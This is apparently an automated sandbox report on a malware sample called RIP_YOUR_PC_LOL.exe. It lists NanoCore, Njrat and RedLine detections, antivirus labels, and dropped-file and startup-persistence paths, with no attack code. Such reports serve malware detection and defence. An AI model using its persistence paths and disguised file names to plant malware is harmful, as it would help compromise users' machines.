                    Source: Process startedAuthor: frack113: Data: Command: "C:\Users\user\AppData\Local\Temp\FFDvbcrdfqs.exe" , CommandLine: "C:\Users\user\AppData\Local\Temp\FFDvbcrdfqs.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\FFDvbcrdfqs.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\FFDvbcrdfqs.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\FFDvbcrdfqs.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe" , ParentImage: C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe, ParentProcessId: 5376, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\FFDvbcrdfqs.exe" , ProcessId: 6920

                    Stealing of Sensitive Information

                    barindex
                    Sigma detected: NanoCore
                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\Opus.exe, ProcessId: 3244, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

                    Remote Access Functionality

                    barindex
                    Sigma detected: NanoCore
                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\Opus.exe, ProcessId: 3244, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus detection for dropped file
                    Source: C:\Users\user\AppData\Local\Temp\FFDvbcrdfqs.exeAvira: detection malicious, Label: TR/Dropper.Gen
                    Source: C:\Users\user\AppData\Roaming\Opus.exeAvira: detection malicious, Label: TR/Dropper.MSIL.Gen7
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeAvira: detection malicious, Label: TR/ATRAPS.Gen
                    Source: C:\Users\user\AppData\Roaming\___11.19.exeAvira: detection malicious, Label: TR/Dropper.GR
                    Source: C:\Users\user\AppData\Roaming\___11.19.exeAvira: detection malicious, Label: TR/Agent.aagt
                    Source: C:\Users\user\AppData\Roaming\healastounding.exeAvira: detection malicious, Label: TR/AD.RedLineSteal.cjshc
                    Source: C:\Users\user\AppData\Roaming\healastounding.exeAvira: detection malicious, Label: TR/Dropper.MSIL.Gen7
                    Source: C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exeAvira: detection malicious, Label: TR/AD.MalwareCrypter.rrsdk
                    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeAvira: detection malicious, Label: TR/Dropper.MSIL.Gen7
                    Source: C:\Windows\Help\active_desktop_render.dllAvira: detection malicious, Label: HEUR/AGEN.1245024
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a797c6ca3f5e7aff8fa1149c47fe9466.exeAvira: detection malicious, Label: TR/ATRAPS.Gen
                    Source: C:\Users\user\AppData\Roaming\gay.exeAvira: detection malicious, Label: TR/ATRAPS.Gen
                    Source: C:\Users\user\AppData\Local\Temp\Dcvxaamev.exeAvira: detection malicious, Label: TR/Dropper.Gen
                    Source: C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exeAvira: detection malicious, Label: TR/Dropper.Gen
                    Source: C:\Users\user\AppData\Roaming\22.exeAvira: detection malicious, Label: HEUR/AGEN.1227810
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeAvira: detection malicious, Label: TR/AD.MExecute.lzrac
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeAvira: detection malicious, Label: SPR/Tool.MailPassView.473
                    Source: C:\Windows\Cursors\WUDFhosts.exeAvira: detection malicious, Label: HEUR/AGEN.1213003
                    Source: C:\Users\user\AppData\Roaming\a.exeAvira: detection malicious, Label: TR/AD.RedLineSteal.cjshc
                    Source: C:\Users\user\AppData\Roaming\3.exeAvira: detection malicious, Label: HEUR/AGEN.1203070
                    Source: C:\Users\user\AppData\Roaming\test.exeAvira: detection malicious, Label: TR/Dropper.Gen
                    Source: C:\Users\user\AppData\Roaming\aaa.exeAvira: detection malicious, Label: TR/Dropper.MSIL.Gen
                    Yara detected Nanocore RAT
                    Source: Yara matchFile source: RIP_YOUR_PC_LOL.exe, type: SAMPLE
                    Source: Yara matchFile source: 9.2.Opus.exe.840000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.Opus.exe.840000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.Opus.exe.5b00000.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.4474268.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.Opus.exe.5b00000.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.900000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.4474268.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.Opus.exe.840000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.14.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.Opus.exe.3edeacc.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.Opus.exe.840000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.900000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.900000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.Opus.exe.3ed9c96.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.Opus.exe.3edeacc.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.Opus.exe.3ee30f5.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.902324.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.Opus.exe.5b04629.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.Opus.exe.840000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.14.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.900000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.900000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000000.414257385.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.707363158.0000000003ECB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000000.414807841.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000000.416456851.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.700831183.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000024.00000000.475797127.0000000000572000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.567040014.0000000003081000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.385235005.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.463698979.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000000.491059532.0000000000272000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000024.00000002.629223400.0000000000572000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000000.415266906.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.579383399.0000000004081000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000000.371829021.0000000001893000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.514866763.0000000000922000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.546334194.0000000004474000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.381351381.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000000.461250332.0000000000922000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.679442760.0000000001893000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.708751563.0000000005B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000024.00000002.674377761.0000000003CF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000024.00000002.673042782.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.382829254.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.383946223.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: healastounding.exe PID: 3572, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Opus.exe PID: 3244, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Opus.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\healastounding.exe, type: DROPPED
                    Multi AV Scanner detection for submitted file
                    Source: RIP_YOUR_PC_LOL.exeVirustotal: Detection: 63%Perma Link
                    Source: RIP_YOUR_PC_LOL.exeMetadefender: Detection: 33%Perma Link
                    Source: RIP_YOUR_PC_LOL.exeReversingLabs: Detection: 73%
                    Yara detected Njrat
                    Source: Yara matchFile source: RIP_YOUR_PC_LOL.exe, type: SAMPLE
                    Source: Yara matchFile source: 4.2.healastounding.exe.34865dc.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.gay.exe.d0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.gay.exe.d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.1d1caed.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.3479694.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.95312e.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.0.mediaget.exe.ab0000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.95312e.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.95312e.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.0.mediaget.exe.ab0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.900000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.95312e.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.3474284.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.14.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.mediaget.exe.ab0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.935129.15.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.gay.exe.d0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.gay.exe.d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.935129.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.34865dc.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.900000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.1d1caed.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.900000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.95312e.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.95312e.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.95312e.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.0.mediaget.exe.ab0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.95312e.13.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.RIP_YOUR_PC_LOL.exe.5707591.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.935129.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.935129.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.0.mediaget.exe.ab0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.gay.exe.d0000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.95312e.13.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.RIP_YOUR_PC_LOL.exe.5725596.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.900000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.935129.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.95312e.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.900000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000008.00000000.411478373.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.449565052.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002A.00000000.507357595.0000000000FB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000000.445953483.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.701265514.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000003B.00000000.627731740.00000000007A2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002E.00000000.548907669.0000000000722000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000000.445251023.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.385235005.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002E.00000002.610238464.0000000000722000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002A.00000002.552899490.0000000000FB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.538356356.0000000003471000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000000.410285813.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.463698979.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000000.408615715.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000000.447375879.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.386628983.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000000.371829021.0000000001893000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000000.446671445.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000000.409570794.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.381351381.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.679442760.0000000001893000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.382829254.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.383946223.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: healastounding.exe PID: 3572, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: gay.exe PID: 1104, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: mediaget.exe PID: 4688, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\gay.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a797c6ca3f5e7aff8fa1149c47fe9466.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\mediaget.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\healastounding.exe, type: DROPPED
                    Antivirus / Scanner detection for submitted sample
                    Source: RIP_YOUR_PC_LOL.exeAvira: detected
                    Source: RIP_YOUR_PC_LOL.exeAvira: detected
                    Source: RIP_YOUR_PC_LOL.exeAvira: detected
                    Source: RIP_YOUR_PC_LOL.exeAvira: detected
                    Source: RIP_YOUR_PC_LOL.exeAvira: detected
                    Source: RIP_YOUR_PC_LOL.exeAvira: detected
                    Source: RIP_YOUR_PC_LOL.exeAvira: detected
                    Multi AV Scanner detection for dropped file
                    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeMetadefender: Detection: 85%Perma Link
                    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeReversingLabs: Detection: 100%
                    Source: C:\Users\user\AppData\Local\Temp\Dcvxaamev.exeMetadefender: Detection: 29%Perma Link
                    Source: C:\Users\user\AppData\Local\Temp\Dcvxaamev.exeReversingLabs: Detection: 85%
                    Source: C:\Users\user\AppData\Local\Temp\FFDvbcrdfqs.exeMetadefender: Detection: 29%Perma Link
                    Source: C:\Users\user\AppData\Local\Temp\FFDvbcrdfqs.exeReversingLabs: Detection: 85%
                    Source: C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exeMetadefender: Detection: 29%Perma Link
                    Source: C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exeReversingLabs: Detection: 92%
                    Source: C:\Users\user\AppData\Roaming\22.exeMetadefender: Detection: 38%Perma Link
                    Source: C:\Users\user\AppData\Roaming\22.exeReversingLabs: Detection: 85%
                    Source: C:\Users\user\AppData\Roaming\3.exeMetadefender: Detection: 47%Perma Link
                    Source: C:\Users\user\AppData\Roaming\3.exeReversingLabs: Detection: 82%
                    Source: C:\Users\user\AppData\Roaming\4.exeReversingLabs: Detection: 75%
                    Source: C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exeMetadefender: Detection: 26%Perma Link
                    Source: C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exeReversingLabs: Detection: 85%
                    Machine Learning detection for sample
                    Source: RIP_YOUR_PC_LOL.exeJoe Sandbox ML: detected
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Local\Temp\FFDvbcrdfqs.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\Opus.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\___11.19.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\healastounding.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\4.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeJoe Sandbox ML: detected
                    Source: C:\Windows\Help\active_desktop_render.dllJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a797c6ca3f5e7aff8fa1149c47fe9466.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\gay.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\Dcvxaamev.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\22.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeJoe Sandbox ML: detected
                    Source: C:\Windows\Cursors\WUDFhosts.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\a.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\3.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\test.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\aaa.exeJoe Sandbox ML: detected
                    Source: 9.2.Opus.exe.840000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
                    Source: 14.0.8f1c8b40c7be588389a8d382040b23bb.exe.476f20.4.unpackAvira: Label: TR/Dropper.Gen
                    Source: 4.0.healastounding.exe.900000.4.unpackAvira: Label: TR/AD.RedLineSteal.cjshc
                    Source: 4.0.healastounding.exe.900000.4.unpackAvira: Label: TR/Dropper.MSIL.Gen7
                    Source: 5.0.Pluto Panel.exe.f10000.8.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 5.0.Pluto Panel.exe.f10000.8.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 9.0.Opus.exe.840000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
                    Source: 5.2.Pluto Panel.exe.f10000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 5.2.Pluto Panel.exe.f10000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 14.0.8f1c8b40c7be588389a8d382040b23bb.exe.4bdf52.2.unpackAvira: Label: TR/Dropper.Gen
                    Source: 12.2.aaa.exe.2c0000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen
                    Source: 8.0.gay.exe.d0000.2.unpackAvira: Label: TR/ATRAPS.Gen
                    Source: 12.0.aaa.exe.2c0000.2.unpackAvira: Label: TR/Dropper.MSIL.Gen
                    Source: 0.3.RIP_YOUR_PC_LOL.exe.57b3478.6.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.5755c99.18.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                    Source: 11.0.22.exe.457136.14.unpackAvira: Label: TR/Crypt.XPACK.Gen7
                    Source: 0.1.RIP_YOUR_PC_LOL.exe.9f22de.1.unpackAvira: Label: TR/Inject.vcoldi
                    Source: 14.0.8f1c8b40c7be588389a8d382040b23bb.exe.400000.3.unpackAvira: Label: TR/Dropper.Gen
                    Source: 6.2.test.exe.da0000.0.unpackAvira: Label: TR/Dropper.Gen
                    Source: 8.2.gay.exe.d0000.0.unpackAvira: Label: TR/ATRAPS.Gen
                    Source: 12.0.aaa.exe.2c0000.1.unpackAvira: Label: TR/Dropper.MSIL.Gen
                    Source: 4.2.healastounding.exe.900000.0.unpackAvira: Label: TR/AD.RedLineSteal.cjshc
                    Source: 4.2.healastounding.exe.900000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
                    Source: 14.0.8f1c8b40c7be588389a8d382040b23bb.exe.476f20.1.unpackAvira: Label: TR/Dropper.Gen
                    Source: 4.0.healastounding.exe.900000.0.unpackAvira: Label: TR/AD.RedLineSteal.cjshc
                    Source: 4.0.healastounding.exe.900000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
                    Source: 14.0.8f1c8b40c7be588389a8d382040b23bb.exe.400000.6.unpackAvira: Label: TR/Dropper.Gen
                    Source: 9.2.Opus.exe.5b00000.7.unpackAvira: Label: TR/NanoCore.fadte
                    Source: 14.0.8f1c8b40c7be588389a8d382040b23bb.exe.4bdf52.5.unpackAvira: Label: TR/Dropper.Gen
                    Source: 11.0.22.exe.457136.21.unpackAvira: Label: TR/Crypt.XPACK.Gen7
                    Source: 0.1.RIP_YOUR_PC_LOL.exe.dda1e2.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                    Source: 14.0.8f1c8b40c7be588389a8d382040b23bb.exe.400000.9.unpackAvira: Label: TR/Dropper.Gen
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.e387f7.8.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 6.0.test.exe.da0000.0.unpackAvira: Label: TR/Dropper.Gen
                    Source: 17.0.mediaget.exe.ab0000.3.unpackAvira: Label: TR/ATRAPS.Gen
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.d587a1.7.unpackAvira: Label: TR/Crypt.XPACK.Gen7
                    Source: 17.0.mediaget.exe.ab0000.0.unpackAvira: Label: TR/ATRAPS.Gen
                    Source: 11.0.22.exe.457136.9.unpackAvira: Label: TR/Crypt.XPACK.Gen7
                    Source: 9.0.Opus.exe.840000.3.unpackAvira: Label: TR/Dropper.MSIL.Gen7
